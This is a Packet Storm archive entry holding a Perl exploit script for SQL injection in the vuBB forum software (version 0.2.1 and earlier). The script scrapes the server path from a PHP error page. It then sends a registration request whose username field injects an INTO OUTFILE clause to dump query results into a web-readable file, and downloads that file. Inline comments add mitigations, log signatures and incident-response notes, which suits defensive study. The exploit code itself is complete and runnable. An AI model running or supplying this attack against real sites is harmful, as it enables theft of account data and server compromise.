vubb021b.txt

2006-06-26T00:00:00
ID PACKETSTORM:47686
Type packetstorm
Reporter DarkFig
Modified 2006-06-26T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#  
# by DarkFig -- acid-root.new.fr  
# French Advisory (vuBB <= 0.2.1 [BFA] SQL Injection, XSS, CRLF Injection, Full Path Disclosure): http://www.acid-root.new.fr/advisories/vubb021b.txt  
#  
use IO::Socket;  
use LWP::Simple;  
  
  
# Header  
# Prints the script banner. The title names the affected product and version
# range (vuBB <= 0.2.1 [BFA]) and the bug class (SQL injection).
print "\r\n+---------------------------------------+", "\r\n";  
print "| vuBB <= 0.2.1 [BFA] SQL Injection -|", "\r\n";  
print "+---------------------------------------+", "\r\n";  
  
  
# Usage  
# Three positional arguments are expected: host, forum path, username.
# The test is on the truthiness of $ARGV[2], so a third argument of "0" or ""
# is treated the same as a missing one. Nothing else about the arguments is
# validated before they are placed into URLs and the request body below.
if(!$ARGV[2]){  
print "| Usage: <host> <path> <username> ------|", "\r\n";  
print "+---------------------------------------+", "\r\n";  
exit;  
}  
  
  
# Host  
# Uses whatever follows "http://" in the first argument as the host name, or
# the argument as given when that prefix is absent.
# $host is assigned without `my`, so it is a package global; the script does
# not enable strict or warnings.
# NOTE(review): the pattern is unanchored and only knows "http://"; an
# "https://" argument is kept verbatim, and the script only speaks plain HTTP.
if($ARGV[0] =~ /http:\/\/(.*)/){  
$host = $1;  
} else {  
$host = $ARGV[0];  
}  
print "[+]Host: $host\r\n";  
  
  
# Var  
# Request parameters and messages used by the rest of the script.
#   $path  forum base path; the concatenations below assume it ends in "/".
#   $user  value sent in the `user` field of the registration form.
#   $port  hard-coded to 80, i.e. plain HTTP only.
#   $fpd   URL of includes/vubb.php, requested directly over the web.
#   $poti  request line for the registration handler
#          (index.php?act=register&action=register).
# Defender view: in access logs these appear as a direct GET of
# includes/vubb.php followed by a POST to the register action from the same
# client. Include files are not normally requested directly, so the pairing is
# a useful thing to alert on.
my $path = $ARGV[1];  
my $user = $ARGV[2]; print "[+]User: $user\r\n";  
my $port = 80;  
my $fpd = "http://".$host.$path."includes/vubb.php";  
my $err1 = "[-]Can't connect to the host\r\n";  
my $err2 = "[-]Can't retrieve the full path\r\n";  
my $err3 = "[-]Can't retrieve the results\r\n";  
my $poti = "POST "."$path"."index.php?act=register&action=register"." HTTP/1.1";  
  
  
# Full Path Disclosure  
# Fetches includes/vubb.php directly and looks in the response body for text
# of the form "in <b>...</b>" that ends in /includes/vubb.php. The part before
# that suffix is taken as the forum's directory on the server's filesystem.
# NOTE(review): this presumably matches an HTML-formatted PHP error message
# emitted when the include file is run on its own -- confirm against the
# application.
# Mitigation: do not send error output to clients in production (PHP's
# display_errors off, log to a file instead), and deny web access to the
# includes/ directory.
#
# As written, a failed fetch prints $err1 and then `die` is called with
# print's return value; the end() after `and` is not reached on that path.
# $req0 and $fullpath are package globals (no `my`).
$req0 = get($fpd) or die print $err1 and end();  
if($req0 =~ /in <b>(.*)\/includes\/vubb.php<\/b>/) {  
# Target file for the later query output: a fixed name inside the forum's own
# directory, i.e. somewhere the web server will serve it from.
$fullpath = $1."/thisismypasswd.txt";  
print "[+]Path: $1\r\n";  
} else {  
print $err2 and end();  
}  
  
  
# Malicious data  
# Builds the registration form body. The `user` field carries the supplied
# username followed by the URL-encoded text  ' INTO OUTFILE '<fullpath>'#
# (%27 is a single quote, %23 is '#'). The remaining fields are fixed filler
# values so the form passes as a registration attempt.
# NOTE(review): this implies the register handler places `user` into a SQL
# statement without escaping, so the quote ends the string literal and the
# rest becomes part of the query -- confirm against the vuBB source.
#
# Mitigation:
#   - bind `user` as a query parameter (or escape it) in the register handler;
#   - run the forum with a database account that lacks the FILE privilege, and
#     set MySQL's secure_file_priv so the server cannot write under the web
#     root;
#   - keep the web root unwritable by the database server's OS user.
# Detection: POST bodies to the register action containing "INTO+OUTFILE" or
# an encoded quote in `user`; the constant markers
# "a669c4570f%40hotmail.com" and "agreement=iacceptohackit"; a file named
# thisismypasswd.txt appearing in the forum directory.
my $pdat = "user=$user"."%27+INTO+OUTFILE+%27"."$fullpath"."%27%23"."&email=a669c4570f%40hotmail.com&vemail=a669c4570f%40hotmail.com&pass=mypassword&vpass=mypassword&agreement=iacceptohackit&agree=on";  
my $ldat = length $pdat;  
# Raw TCP connection to port 80; on failure $err1 is printed and end() exits.
my $req1 = IO::Socket::INET->new(  
PeerAddr => $host,  
PeerPort => $port,  
Proto => "tcp"  
) or print $err1 and end();  
# Hand-written HTTP/1.1 request with only Host, Content-Type and
# Content-Length headers. Fingerprint for log/IDS rules: no User-Agent is
# sent, and the header block is terminated with "\r\n\n" rather than the
# standard "\r\n\r\n".
print $req1 "$poti", "\r\n";  
print $req1 "Host: $host", "\r\n";  
print $req1 "Content-Type: application/x-www-form-urlencoded", "\r\n";  
print $req1 "Content-Length: $ldat", "\r\n\n";  
print $req1 "$pdat", "\r\n";  
# The socket is closed without reading the server's response.
close($req1);  
  
  
# Results  
# Requests thisismypasswd.txt from the forum path over HTTP and saves the body
# locally as VUBB_RESULT.txt. On a failed fetch $err3 is printed and end()
# exits.
# Incident response: the file is left on the server inside the web root and is
# readable by any client that requests it. If it is found, preserve it as
# evidence, remove it, and treat whatever account data it contains as
# disclosed.
# NOTE(review): $path already ends in "/" by the script's own convention, so
# the requested URL presumably contains "//thisismypasswd.txt" -- another
# string to search access logs for.
$req2 = get("http://".$host.$path."/thisismypasswd.txt") or print $err3 and end();  
# Bareword handle, two-argument open, return value not checked.
open(f, ">VUBB_RESULT.txt");  
print f $req2;  
close(f);  
print "[+]Done: VUBB_RESULT.txt\r\n";  
end();  
  
  
# Bye  
sub end {
    # Print the closing rule of the banner box, then terminate the script.
    my $footer = "+---------------------------------------+";
    print $footer . "\r\n";
    exit;
}
`